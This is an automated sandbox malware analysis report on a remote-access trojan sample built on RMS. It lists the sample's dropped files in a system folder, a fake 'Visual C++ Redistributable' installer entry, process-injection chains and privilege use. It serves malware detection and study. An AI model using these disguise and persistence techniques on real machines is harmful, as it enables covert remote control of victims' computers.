Malware Analysis Report

2024-11-30 19:49

Sample ID 220128-r4yy6sfbf9
Target a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6
SHA256 a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6
Tags
rms evasion rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6

Threat Level: Known bad

The file a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6 was found to be: Known bad.

Malicious Activity Summary

rms evasion rat trojan upx

RMS

UPX packed file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Runs ping.exe

Modifies data under HKEY_USERS

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies registry class

Suspicious behavior: SetClipboardViewer

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 14:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 14:45

Reported

2022-01-28 15:01

Platform

win7-en-20211208

Max time kernel

151s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f760eef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI10E2.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f760ef3.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f760eef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f760ef1.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f760ef1.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1F93.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
